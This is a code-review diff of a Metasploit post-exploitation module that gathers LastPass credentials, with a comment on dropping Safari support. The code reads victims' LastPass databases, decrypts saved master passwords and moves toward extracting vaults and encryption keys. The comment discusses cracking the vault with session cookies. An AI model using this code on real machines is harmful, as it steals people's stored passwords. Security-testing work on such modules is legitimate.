modules/post/multi/gather/lastpass_creds.rb

```diff
@@ -42,129 +43,108 @@ def run
-              "#{account}'s #{browser} LastPass database #{path}"
-            )
+    print_status "Extracting vault and iterations"
+    extract_vault_and_iterations(account_map)
 
-            # Parsing/Querying the DB
-            db = SQLite3::Database.new(loot_path)
-            lastpass_user, lastpass_pass = db.execute(
-              "SELECT username, password FROM LastPassSavedLogins2 " \
-              "WHERE username IS NOT NULL AND username != '' " \
-              "AND password IS NOT NULL AND password != '';"
-            ).flatten
-            if lastpass_user && lastpass_pass
-              credentials << [account, browser, lastpass_user, lastpass_pass]
-            end
-          end
-        end
-      end
-    end
+    print_status "Extracting encryption keys"
+    extract_vault_keys(account_map)
 
-    credentials_table = Rex::Ui::Text::Table.new(
-      'Header' => "LastPass credentials",
-      'Indent' => 1,
-      'Columns' => %w(Account Browser LastPass_Username LastPass_Password)
-    )
-    # Parse and decrypt credentials
-    credentials.each do |row| # Decrypt passwords
-      account, browser, user, enc_pass = row
-      vprint_status "Decrypting password for #{account}'s #{user} from #{browser}"
-      password = clear_text_password(user, enc_pass)
-      credentials_table << [account, browser, user, password]
-    end
-    unless credentials.empty?
-      print_good credentials_table.to_s
-      path = store_loot(
-        "lastpass.creds",
-        "text/csv",
-        session,
-        credentials_table.to_csv,
-        nil,
-        "Decrypted LastPass Master Passwords"
-      )
-    end
+    print_lastpass_data(account_map)
   end
 
-  # Returns a mapping of { Account => { Browser => paths } }
+  # Returns a mapping of lastpass accounts
   def build_account_map
     platform = session.platform
     profiles = user_profiles
-    found_dbs_map = {}
-
-    if datastore['VERBOSE']
-      vprint_status "Found #{profiles.size} users: #{profiles.map { |p| p['UserName'] }.join(', ')}"
-    else
-      print_status "Found #{profiles.size} users"
-    end
+    account_map = {}
 
     profiles.each do |user_profile|
       account = user_profile['UserName']
       browser_path_map = {}
+      localstorage_path_map = {}
+      cookies_path_map = {}
 
       case platform
       when /win/
         browser_path_map = {
           'Chrome' => "#{user_profile['LocalAppData']}\\Google\\Chrome\\User Data\\Default\\databases\\chrome-extension_hdokiejnpimakedhajhdlcegeplioahd_0",
           'Firefox' => "#{user_profile['AppData']}\\Mozilla\\Firefox\\Profiles",
-          'Opera' => "#{user_profile['AppData']}\\Opera Software\\Opera Stable\\databases\\chrome-extension_hnjalnkldgigidggphhmacmimbdlafdo_0",
-          'Safari' => "#{user_profile['LocalAppData']}\\Apple Computer\\Safari\\Databases\\safari-extension_com.lastpass.lpsafariextension-n24rep3bmn_0"
+          'IE' => "#{user_profile['LocalAppData']}Low\\LastPass",
```

Comment:
Apple discontinued Safari on Windows, there is non in Linux and in Mac I cannot get the session cookie to crack the vault. That is why I removed it. I could still add it only for Mac since it is still possible to obtain the Master Password if the victim clicked "Remember Password" but that's all